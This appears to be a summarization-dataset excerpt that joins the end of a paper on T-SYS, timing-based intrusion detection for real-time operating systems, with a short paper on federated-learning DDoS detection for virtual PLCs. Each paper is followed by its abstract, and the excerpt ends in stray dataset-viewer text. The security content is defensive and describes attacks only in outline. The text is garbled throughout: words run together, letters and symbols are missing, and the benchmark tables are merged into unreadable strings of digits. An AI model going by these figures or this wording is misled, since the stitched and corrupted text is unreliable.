BCET and WCET. Sometimes,theminimumobserveddetectableattackstagnates afteracertain value.Thisoccursoncetheentiretaskiscontained within one region; increasing does not lead to anincreaseinregionlengthafterthat,i.e.,thereisnofurtherloosen-ingoftimingboundsas increases.ThisisseeninFigure6, which details the maximum observed vulnerability for attacks that occurwithinthe kernel, particularly during mutex releases/acquisi- tion, and context switches as a result of task completion. Results for these kernel paths were obtained from the modified PapaBench tasksetrepresentingprotected usercode.Thekernelpathattacks aregraphedseparatelytoindicatethattheyoccurwithinthekernel (and not user code as previously for PapaBench attacks). Figure 6: Minimum attack vulnerability vs. for se- lected kernel paths. We also remark that one could establish a minimum guaranteed vulnerability if attach vectors were placed in each region and then graduallyincreasedasinourexperiment.Suchanapproachaslinear complexity if the BCET can be triggered within a given region and would results in a tighter bound than a given value. 7.2 Performance Impact Theelasticnatureof providesacustomizeabletradeoff between vulnerability and performance for a software implementa-tionofT-SYS.Raising allowsforreducedoverheaddueto 254 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:54 UTC from IEEE Xplore. Restrictions apply. lessfrequentIPs atthecostofincreasedvulnerabilityduetolaxer timing bounds. Similarly, lowering reduces the vulnera- bility of the system at the cost of introducing more frequent IPs, and thus greater execution time overhead. In the case of hardware support for T-SYS, time overhead is zero (see Section 4). Execution times reported in Tables 1 and 2 were gathered experimentally and averaged over 50 runs. AscanbeseeninTable1,integratingT-SYSdoesinducesome overheadinexecutiontimeastheunprotectedcontrolgroupalways has the lowest execution time. The overhead is highest for the smallest .Itconsistentlydropsas isincreased. An exception is cnt, which stays leveled for values of above 2,000. As cnthas a WCET less than 2,000, for all values abovethat,itstillhasonlyoneIPatthestartoftheprogram,and thushasnearlynooverhead.Table2displayssimilarbehaviorin most entries (for kernel and user tasks). It should be noted that, even for the lowest value of tested (corresponding to the highest overhead), all PapaBench tasks still completed before their deadlines, indicating that enough slack existed with in the original, unprotected code base to accommodate significant protection. ( sec)unprotected 10002000300040005000 adpcm 321079613574484969458921423463362904 lms 518362989697782991741223684509585666 fft 68315130266103367 976159015676695 cnt 198126012226199119921990 statemate 295433563840446305422211390409334027 edn 147086280464221775209940193686166191 qsort-exam 651812180 9848965986036871 st 426710813607642774609665562184481264 Table 1: Average execution time (in sec) of Malardalen benchmarks for different values of . ( sec)unprotected 100200300400500 navigation 6141162921863821685 servo_transmit 186262199201197198 autopilot 292426385342301305 context_switch 157197176157158156 mutex_acquire 245297278246244245 mutex_release 221271245223221220 Table2:Averageexecutiontime(in sec)ofPapaBenchtasks and kernel paths for different values of . 7.3 Comparison with Bellec We compare T-SYS to Bellec in terms of number of regions created during instrumentation and number of regions entered during exe- cution,analogoustoinstrumentationpointsexecuted.Forpurposes of comparison, the parameter used was the correspond- ing maximum attack width (MAW) determined by Bellec. For each task, we use this value as a baseline for four separate T-SYS in- strumentations: (1) base (T-SYS), (2)1 2of base (T-SYS(0.5x)), (3) 2X base (T-SYS(2x)), and (4) 5X base (T-SYS(5x)). This allows us to analyze how T-SYS com- pares when taking advantage of its elasticity. Table 3 reports the number of regions created per algorithm. T-SYScreatesfewerregionsthanBellecforMalardalentasksforan equivalent (baseline), ranging from 3%-28% depending on code shape. When is cut in half (T-SYS(0.5x)), signifi- cantlymoreregionsarecreatedthanforbaseT-SYSorforBellec. This is expected, as reducing limits the length of regions.TaskBase MAWBellecT-SYST-SYS(0.5x)T-SYS(2x)T-SYS(5x) adpcm 9007 36317423 6 lms 1210 4734681711 fft 1117 4138721912 cnt 274 15 917 52 statemate 2970 21193413 7 edn 3155 3226491810 qsort-exam 614 25236214 9 st 8001 181628 95 navigation 121 55931 servo_transmit 93 33511 autopilot 134 7610 41 Table3:ComparisonofBellecvsT-SYSalgorithms,bynum- ber of regions created. When isincreasedabovethebasevalue,thenumber of regions created drops compared to base instrumentation of both BellecandT-SYS.With2X ,thedropinregioncountvaries widely(between23%and50%)asT-SYShasmorerulesforregion structure than maximum length requirements. Thus, granularity does not always scale linearly with . When increasing to5X,aconsistentlylargedropisobservedinmostcases. NoticethatsmallertasksfromPapaBenchareentirelycontained within a single region at 5X. Next, the number of regions encountered dynamically during executioniscompared,eachofwhichcorrespondstoatimerupdateforthesoftwareimplementationofbothalgorithms.Inexperiments, the Malardalen benchmarks were run to completion while the Pa- paBench task set ran for 3 seconds, constituting 6 hyperperiods. TaskBase MAWBellecT-SYST-SYS(0.5x)T-SYS(2x)T-SYS(5x) adpcm 9007142561227524912 62401504 lms 1210 407351906241191 fft 1117201717363302 960580 cnt 2745344981011 278101 statemate 2970 7917541294 452239 edn 3155112510521926 618348 qsort-exam 6149719561835 572320 st 8001 6406011209 384198 navigation 1215215131017 221 71 servo_transmit 93312254531 6161 autopilot 1345484571102 246 87 Table4:ComparisonofBellecvsT-SYSalgorithms,bynum- ber of regions entered during execution. The results of this experiment are depicted in Table 4. T-SYS was observed to have an equivalent or lower number of regions encountereddynamicallythanBellecforallbenchmarks.Notethat the percentage difference between T-SYS and Bellec is lower in runtime than in the static case. This is due to T-SYS incorporat-ing code paths into adjacent regions in some cases that are less frequently executed. Bellec sometimes creates separate regions for such paths, but since they are hardly executed, the dynamic counts remain nearly the same. Overall, the dynamic region count follows thesametrendasthestaticone reducing increasesit whileincreasing reducesit.Notethatthedynamicregion countalsostagnatesfor servo_transmit oncethenumberofregions hits 1, as there is no difference between instrumentation under T-SYS(2x) and T-SYS(5x) for that task. 255 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:54 UTC from IEEE Xplore. Restrictions apply. Overall,theelasticityofourT-SYSapproachprovidessignificant savingsoverBellecas isincreased,whichmakesT-SYS far more flexible and user-configurable. 8 CONCLUSION This work has contributed T-SYS, a method for securing real-time applicationsviamonitoringexecutiontime.Wehaveimplementeda compiler-basedtoolforintegratingT-SYSintouserandkernelcode. Timestamp checks are automatically placed at specific locations accordingtoanelastic,user-specifiedMaxVulnparameter.WehaveimplementedsupportforT-SYSintoacommercialoperatingsystemand used the compiler tool to implement protection for benchmarktasksaswellasthekernelitself,crossingtheuser/kernelboundary. WehavecomparedT-SYSwithanotherstate-of-the-arttiming- basedsecuritymethodandfoundthatT-SYSiscompetitiveinterms ofregionscreated,aswellasintermsofregionentryoperations executed during runtime, while providing the unique ability of uni- fied protection outside and inside the kernel as well when crossing kernelboundaries.Overall,T-SYSprovidesaversatile,user-friendly and elastic environment for enhancing real-time tasks with timed protection, which can complement conventional security means in safety-critical environments with lower overhead than prior work. ACKNOWLEDGMENT This work was supported in part by NSF grants 1813004 and 1525609.
Summary:
Theincreasingproliferationofcyber-physicalsystemsinamulti- tude of applications presents a pressing need for effective methods ofsecuringsuchdevices.Manysuchsystemsaresubjecttotight timing constraints, which are poorly suited to traditional security methods due to the large runtime overhead and execution time variation introduced. However, the regular (and well documented) timing specifications of real-time systems open up new avenues with which such systems can be secured. This paper contributes T-SYS, a timed-system method of de- tectingintrusionsintoreal-timesystemsviatiminganomalies.A prototype implementation of T-SYS is integrated into a commer- cial real-time operating system (RTOS) in order to demonstrate its feasibility.Further,acompiler-basedtoolisdevelopedtorealizea T-SYS implementation with elastic timing bounds. This tool sup- portsintegrationofT-SYSprotectionintoapplicationsaswellasthe RTOS thekernel itself. Results onan ARM hardwareplatform with benchmark tasks including those drawn from an open-source UAV code base compare T-SYS with another method of timing-based intrusiondetectionandassessitseffectivenessintermsofdetecting attacks as they intrude a system.
|
Summarize:
Index T erms IIoT, Industry 4.0, Federated Learning, DDoS Detection, vPLC I. I NTRODUCTION Industry 4.0 aims to break away from the conventional au- tomation pyramid by closely integrating production and busi- ness levels through cyber-physical systems (CPSs), which con- nect physical and virtual worlds. This integration will enable automation systems to become more exible and intelligent [1]. However, the current industrial landscape is characterized by specialized hardware and software components designed for speci c purposes, resulting in a mix of communication technologies within industrial automation. An instance of this would be Programmable Logic Controllers (PLCs), which have the task of regulating tangible procedures by utilizing The project is funded by Science Foundation of Ireland (SFI) under the Grant 16/RC/3918 and EU s MSCA with agreement Number 847577sensors and actuators to interact with the physical realm. These devices are customized and commissioned for speci c appli- cations and use cases, and also employ proprietary hardware and software, often speci c to the manufacturer, which makes it challenging to integrate different systems and can lead to vendor lock-in [2]. Virtual Programmable Logic Controllers (vPLCs) address the limitations of traditional PLCs by utilizing virtualization technology [3]. With vPLCs, deterministic real-time control is executed on virtualized edge servers, and the cloud provides the comprehensive vPLC management interface. This means that vPLCs are not limited to speci c hardware and can be easily scaled and modi ed based on changing requirements. Thus, vPLCs offer increased exibility, scalability, and cost- effectiveness compared to traditional PLCs. As the vPLC solution is cloud-based, it supports the in- tegration of production and business levels and offers in- creased resilience. The VMware Edge Compute Stack (ECS) ef ciently manages resources located at the edge accord- ing to each vPLC s requirements. Furthermore, the complete virtualization of PLC controls utilizing the VMware ECS, which facilitates the operation of Virtual Machines (VM) and containers on standard IT servers at the edge, plays a crucial role in enhancing industrial automation. In summary, vPLCs offer increased exibility, scalability, and cost-effectiveness compared to traditional PLCs. However, Industrial control systems (ICS), including vPLCs are vulnerable to cyberattacks that can have severe con- sequences for critical infrastructure [4]. Attackers aim to compromise vPLC systems by exploiting vulnerabilities in the communication protocols or gaining unauthorized access to one of the systems in the industrial networks. Denial- of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks [5] are the major threat to the availability of vPLCs, as they can exhaust system resources and cause downtime. Furthermore, the ModBus/TCP , Pro net/IP , DNP3 communi- cation protocol used by vPLCs lacks built-in security features, making it susceptible to attacks that ood the system with TCP SYN requests. Conventional security solutions, such as anti-virus software and intrusion detection systems, are not suitable for safe- guarding vPLCs as a result of their constrained resources. 2332023 IEEE International Conference on Smart Computing (SMARTCOMP) 2693-8340/23/$31.00 2023 IEEE DOI 10.1109/SMARTCOMP58114.2023.000582023 IEEE International Conference on Smart Computing (SMARTCOMP) | 979-8-3503-2281-1/23/$31.00 2023 IEEE | DOI: 10.1109/SMARTCOMP58114.2023.00058 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply. Furthermore, the effectiveness of existing Machine Learning (ML) and Deep Learning (DL) models for detecting such attacks is limited due to the lack of data available for training the model within the industrial site. Additionally, these isolated models are not equipped to recognize new attack types or variants encountered by other industries, which is critical information as it could potentially affect their industry in the future. Therefore this research work proposes a solution to address DDoS attacks on vPLCs in industrial settings by utilizing Federated Learning (FL). The solution involves a Federated Learning enabled Threat Intelligence Unit (FedTIU) located along with vPLC at the VMware ECS. FedTIU at ECS acts as a gateway for all requests to the vPLC. The FedTIU uses a trained model to classify the request as either an attack or normal, and with FL, the classi cation result can be shared with other clients by utilizing a global model. The rest of the paper is organized as follows: Section 2 describes the background and information related to vPLC and an overview of the existing state-of-the-art techniques. Section 3 presents the attack scenario and section 4 describes the proposed approach against DDoS attack to secure vPLC. Section 5 concludes this work and also discuss about the work in progress for further research. II. B ACKGROUND AND RELA TED WORK This section presents the introduction about vPLC and also discusses the existing state of art techniques present in the literature to handle cyber attacks in ICS. A. About vPLC Since the 1970s, PLCs have been ubiquitous in ICS, offering control to autonomously regulate industrial processes. The manufacturing sector commonly employs various PLCs to precisely perform I/O controls. However, every PLC has been a specialized single-purpose hardware component that requires a controller unit, making it a bulky and costly element to host on-site. Moreover, it is also quite costly if needs to be updated once deployed [6]. In recent years, there has been a drive to separate the logic and control functionalities (software) of the PLC from the I/O element (hardware) [3]. This enables the separation of discrete PLCs from the industrial oor and allows the hosting of control functions at the edge (ex. ECS) in the form of vPLCs [7]. Moreover modernization of the industrial automation com- ponents is happening at pace because it is reducing hardware costs by moving to common Information Technology (IT) infrastructure and commodity hardware. It is also improving operational ef ciency and reducing cost by allowing the PLC to be remotely programmed and upgraded, eliminating on-site visits of the PLC programmer. A virtualization approach to the PLC and the ability to remotely program the PLC is enabling agility and operational ef ciency not possible with the current approach.For example, Software De ned Automation is hosting an in- dustrial Control-as-a-Service offering, leveraging IEC 61131-3 automation software that is allowing for the virtualizing of the PLC software logic within a real-time hypervisor [8]. The IT architecture of Control-as-a-Service builds on the cloud computing paradigm, using an on-premise edge compute stack along with network connectivity to the public cloud [9]. Nevertheless, conventional SCADA and the protocols used, such as Modbus/TCP , Pro net/IP , DNP3, etc., play an indispensable role in communication with most PLC devices. Regrettably, most of these protocols do not have security fea- tures nor authentication required to execute remote commands on a control device. Consequently, the vPLC environment is susceptible to cyber-physical attacks. B. State of Art T echniques in ICS In the current state of research, the development of solutions to counter DDoS attacks and other cyber threats against vPLCs is lacking. The relative novelty of vPLCs has not yet drawn signi cant attention from researchers in this area. Nevertheless, there are some existing solutions that have been proposed by researchers to address cyber threats in traditional ICS. DDoS attacks targeting ICS systems have been a topic of research from years back. Teixeira et al. [10] have examined various types of attacks on control systems that concentrate on disrupting communication between sensors/actuators and a PLC. The protection of PLCs from attacks is challenging due to their limited computing power, resulting in limited research on this topic. In a study by Xiao et al. [11], introduced an approach for detecting anomalies in PLCs using power consumption data. However, these existing solutions against attack detection for PLC are not applicable for providing defense against vPLC. Because vPLCs are software-based emulations of physical PLCs, and as such, they have different security concerns and limitations than physical PLCs. Therefore, new defense mechanisms and security solutions speci cally designed for vPLCs are needed to address the unique security challenges posed by virtualization. III. A TTACK SCENARIO ICS domain faces various attack vectors, but vPLCs are particularly vulnerable due to their integration with cloud com- puting. Attacks on vPLCs fall into three primary categories: attacks that target availability, con dentiality, and integrity. The present work focuses on the scenario depicted in Figure 1 where an attacker, located outside the industrial facility, exploits a vulnerability of the system (existing within the industry periphery) from the public network to gain access to the industrial system. The attacker can gain access through any public website opened by a worker within the industrial site. Once access is gained, the attacker performs a DDoS attack by sending Modbus/TCP packets to the vPLC at a higher rate in comparison to that it was designed to handle. This slows down the supporting supervisory functions of the vPLC, 234 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply. Fig. 1. Attack scenario considered including sharing alarms, collecting management records, and re-con guring the I/O hardware element connected to the vPLC. The attacker executes an ARP spoo ng attack after getting the internal system access by transmitting fraudulent ARP messages that link the attacker s MAC to the IP addresses of both the vPLC and Human Machine Interface (HMI). This enables the attacker to intercept and manipulate network traf c or stop all communication, causing a DoS attack. By executing a DoS attack, the attacker aims to place the system in an unsafe state, hindering the administrative user s ability to supervise or regulate the industrial system. This type of attack is in uenced by the approach outlined in [6]. IV . FL ENABLED THREA T INTELLIGENCE UNIT This section presents federated learning enabled Threat Intelligence Unit to detect the DDoS attack request against vPLC hosted on the edge compute stack in the manufacturing industry. The system model architecture considered is shown in Figure 2 and consists of different sites of manufacturing industries. Instead of hardware PLC, each industry is using a vPLC hosted at ECS. The vPLC processes the request made by the components of an industrial site. However, DDoS attacks can affect the availability of vPLC for serving the benign request as mentioned in section III. The proposed FedTIU sits along the vPLC at ECS and con- sists of three major components; Threat Analysis Unit (TAU), the Screening and ltering Unit (SFU), and the aggregator associated with the ARIA cloud. In more detail, the SFU contains a Traf c Policy Database (TPD) and Filtering Sub- Unit (FISU). TAU includes an Espy Sub-Unit (ESU), Local Training Sub-Unit (LTSU), and the Database (DB) to train the local model. LTSU is responsible for training the local model on the local dataset collected through the ESU. Figure 3 presents the architecture details of the proposed FedTIU. For all the incoming traf c, it will be forwarded to SFU (1). In SFU the TPD forwards it to FISU (2) orsends it to TAU for analysis purposes (3) when no policy is available. ESU classi es the traf c using edge data analysis, responding to the query (4). Meanwhile, ESU noti es LTSU of the suspicious ow (5) and stores the traces in DB. LTSU uses the informed ow to retrain the global model and sends training results to ESU (6). LTSU then distributes policies to TPD (7) and FISU (8). Finally, FISU rejects (9) or sends (10) the ow to access vPLC. A. Threat Analysis Unit The Threat Analysis Unit is responsible for training the local model and predicting new threats. The TAU coordinates with the SFU to respond to new threats and provide policies for them to the TPD and the FISU for future detection. The TAU consists of two major components; (i) an ESU and associated Database which is responsible for classifying the request as per edge data analysis and responding to TDP for the requested query, but does not update the policy. (ii) The LTSU, another TAU unit responsible for performing the local training on the local data. Here we used the hybrid CNN+GRU+MLP based DL model for training the local model. Whenever ESU detects a new treat, it noti es it to the LTSU then the LTSU retrains the model and shares it to the aggregator for global model aggregation. The training results are then sent to TPD and FISU to update and store the policies for the future. B. Screening and Filtering Unit SFU is responsible for monitoring and ltering incoming requests as per the de ned policies. SFU consists of two major components; (i) TPD which is used to store the policies, whenever a request arrives for vPLC it will be rst checked with TPD. If policies exist for such requests they will be forwarded to FISU for ltering. (ii) FISU, lters the traf c as per the traf c policy, i.e. forwards it to vPLC or rejects the ow. C. Aggregator The aggregation process is a crucial step in federated learning, where the model gradients from different LTSUs are combined to update the global model. In our proposed approach, a scheduler selects participants, send the global model to them, participants retrain the model, and send the updated models back for aggregation to update the global model. V. C ONCLUSION There are a number of attack vectors against industrial control systems, but for vPLCs they will now inherit attacks with a heritage in the Internet world, with the adoption of the cloud computing paradigm. Additionally, the communication protocols employed by vPLC lack built-in security measures and do not usually mandate any authentication for executing commands remotely on control devices. Thus the vPLC envi- ronment is open to cyber-physical attacks. In this study, our focus is on the DDoS attack which can affect the availability of vPLC services for its intended users. 235 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply. Fig. 2. System model architecture Fig. 3. Architecture of proposed FedTIU approach Therefore, this work proposed a Federated learning enabled Threat Intelligence Unit to detect DDoS attacks against vPLCs hosted on the ECS in the manufacturing industry. The pro- posed approach consists of three major components: Threat Analysis Unit, Screening and Filtering Unit, and Aggregator. The system model architecture is designed to enable other industrial sites to get their local DL model to learn about the attack in case if it happens on one site, improving the over- all security of the industrial ecosystem. Moreover, proposed model also leverages collaborative learning using FL along with ensuring the data privacy of the individual industrial sites. However, we are working on to simulate the similar envi- ronment to test the proposed approach and include the results in our future research. ACKNOWLEDGMENT The project is funded by Science Foundation of Ireland (SFI) under the Grant 16/RC/3918 and EU s MSCA withagreement Number 847577. This work has also received support from the VMware Academic Program. In order to promote open access, the author has chosen to apply a CC BY public copyright license to any version of the Author Accepted Manuscript that results from this submission.
Summary:
Conventional Programmable Logic Controller (PLC) systems are becoming increasingly challenging to manage due to hardware and software dependencies. Moreover, the number and size of conventional PLCs on factory oors continue to increase, and virtualized PLC (vPLC) offers a solution to address these challenges. The utilization of vPLC offers the advantages of streamlining communication between high-level applications and low-level machine operations, enhancing programming ability in process control systems by abstracting control functions from I/O modules, and increasing automation in industrial control networks. Nevertheless, the connection of vPLC to the internet and cloud services presents a considerable cybersecurity risk, and the crucial aspect of information security for vPLCs is ensuring their availability. Distributed Denial of Service (DDoS) attacks can be particularly devastating for vPLCs, as they rely on internet connectivity to function. DDoS attacks on vPLC overwhelm it and causing it to become unavailable. vPLCs manages control systems and if targeted by a DDoS attack, these systems could become unresponsive, leading to signi cant disruption to industrial processes. Thus, implementing effective DDoS protection measures is crucial for ensuring the availability and reliability of vPLCs in industrial settings. Therefore, this work proposes a Federated learning enabled Threat Intelligence Unit (FedTIU) for detecting DDoS attacks on vPLCs on an Edge Compute Stack near to vPLC. The proposed approach involves collaborative model training using federated learning techniques to gain knowledge of new attack patterns from other industrial sites while maintaining data privacy.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.